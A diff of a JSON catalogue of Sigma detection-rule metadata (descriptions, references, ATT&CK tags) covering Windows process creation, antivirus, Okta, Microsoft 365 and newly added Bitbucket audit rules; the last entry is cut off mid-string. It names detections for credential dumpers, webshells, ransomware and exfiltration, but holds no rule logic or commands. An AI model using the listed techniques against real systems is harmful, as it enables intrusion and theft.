"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -81312,8 +81479,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", "https://twitter.com/harr0ey/status/992008180904419328", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" ], "tags": [ @@ -81379,8 +81546,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" ], "tags": [ @@ -81455,8 +81622,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", + "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" ], "tags": [ @@ -81556,8 +81723,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -81577,39 +81744,6 @@ "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", "value": "Discovery of a System Time" }, - { - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2021/02/11", - "falsepositive": [ - "Legitimate use by administrative staff" - ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "related": [ - { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", - "value": "Remote Access Tool - ScreenConnect Suspicious Execution" - }, { "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", "meta": { @@ -81646,8 +81780,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", "https://support.anydesk.com/Automatic_Deployment", + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml" ], "tags": [ @@ -81681,9 +81815,9 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" ], "tags": [ @@ -81716,8 +81850,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/felixw3000/status/853354851128025088", "https://twitter.com/rikvduijn/status/853251879320662017", + "https://twitter.com/felixw3000/status/853354851128025088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" ], "tags": [ @@ -81750,8 +81884,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://www.pingcastle.com/documentation/scanner/", + "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml" ], "tags": [ @@ -81793,8 +81927,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://twitter.com/0gtweet/status/1674399582162153472", + "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" ], "tags": [ @@ -81827,9 +81961,9 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619", "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448", "https://www.nextron-systems.com/?s=antivirus", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml" ], "tags": [ @@ -81919,10 +82053,10 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797", - "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", "https://www.nextron-systems.com/?s=antivirus", + "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", + "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml" ], "tags": [ @@ -81964,8 +82098,8 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", "https://www.nextron-systems.com/?s=antivirus", + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml" ], "tags": [ @@ -81999,15 +82133,15 @@ "logsource.product": "No established product", "refs": [ "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.nextron-systems.com/?s=antivirus", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.nextron-systems.com/?s=antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ @@ -82040,12 +82174,12 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", - "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", - "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c", - "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916", - "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7", + "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", + "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916", + "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c", + "https://www.nextron-systems.com/?s=antivirus", + "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml" ], "tags": [ @@ -82123,8 +82257,8 @@ "logsource.product": "okta", "refs": [ "https://sec.okta.com/fastpassphishingdetection", - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml" ], "tags": [ @@ -82158,8 +82292,8 @@ "logsource.product": "okta", "refs": [ "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": [ @@ -82182,8 +82316,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml" ], "tags": [ @@ -82216,8 +82350,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md", "https://developer.okta.com/docs/reference/api/system-log/", + "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml" ], "tags": [ @@ -82250,8 +82384,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ @@ -82284,8 +82418,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml" ], "tags": [ @@ -82318,8 +82452,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ @@ -82342,8 +82476,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ @@ -82366,8 +82500,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ @@ -82390,8 +82524,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ @@ -82414,8 +82548,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml" ], "tags": [ @@ -82438,8 +82572,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ @@ -82495,8 +82629,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ @@ -82519,9 +82653,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ + "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data", "https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm", "https://developer.okta.com/docs/reference/api/system-log/", - "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml" ], "tags": [ @@ -82579,8 +82713,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ @@ -82603,8 +82737,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ @@ -82627,8 +82761,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ @@ -82665,8 +82799,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ @@ -82689,8 +82823,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml" ], "tags": [ @@ -82756,8 +82890,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/", "https://o365blog.com/post/aadbackdoor/", + "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml" ], "tags": [ @@ -82790,11 +82924,11 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://o365blog.com/post/aadbackdoor/", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", - "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.sygnia.co/golden-saml-advisory", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml" ], "tags": [ @@ -82827,8 +82961,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml" ], "tags": [ @@ -82861,8 +82995,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml" ], "tags": [ @@ -82895,8 +83029,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml" ], "tags": [ @@ -82929,8 +83063,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml" ], "tags": [ @@ -82953,8 +83087,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml" ], "tags": [ @@ -83020,8 +83154,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml" ], "tags": [ @@ -83054,8 +83188,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml" ], "tags": [ @@ -83088,8 +83222,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml" ], "tags": [ @@ -83112,8 +83246,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml" ], "tags": [ @@ -83146,8 +83280,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml" ], "tags": [ @@ -83213,8 +83347,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml" ], "tags": [ @@ -83247,8 +83381,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml" ], "tags": [ @@ -83268,10 +83402,552 @@ "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "value": "Activity from Suspicious IP Addresses" }, + { + "description": "Detects unauthorized access attempts to a resource.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Access attempts to non-existent repositories or due to outdated plugins. Usually \"Anonymous\" user is reported in the \"author.name\" field in most cases." + ], + "filename": "bitbucket_audit_unauthorized_access_detected.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1586" + ] + }, + "related": [ + { + "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "7215374a-de4f-4b33-8ba5-70804c9251d3", + "value": "Bitbucket Unauthorized Access To A Resource" + }, + { + "description": "Detects Bitbucket global SSH access configuration changes.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_global_ssh_settings_change_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1021.004" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "16ab6143-510a-44e2-a615-bdb80b8317fc", + "value": "Bitbucket Global SSH Settings Changed" + }, + { + "description": "Detects when a repository is exempted from secret scanning feature.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_secret_scanning_exempt_repository_detected.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b91e8d5e-0033-44fe-973f-b730316f23a1", + "value": "Bitbucket Secret Scanning Exempt Repository Added" + }, + { + "description": "Detects user permission data export attempt.", + "meta": { + "author": "Muhammad Faisal (@faisalusuf)", + "creation_date": "2024/02/25", + "falsepositive": [ + "Legitimate user activity." + ], + "filename": "bitbucket_audit_user_permissions_export_attempt_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "bitbucket", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", + "https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1213", + "attack.t1082", + "attack.t1591.004" + ] + }, + "related": [ + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "87cc6698-3e07-4ba2-9b43-a85a73e151e2", + "value": "Bitbucket User Permissions 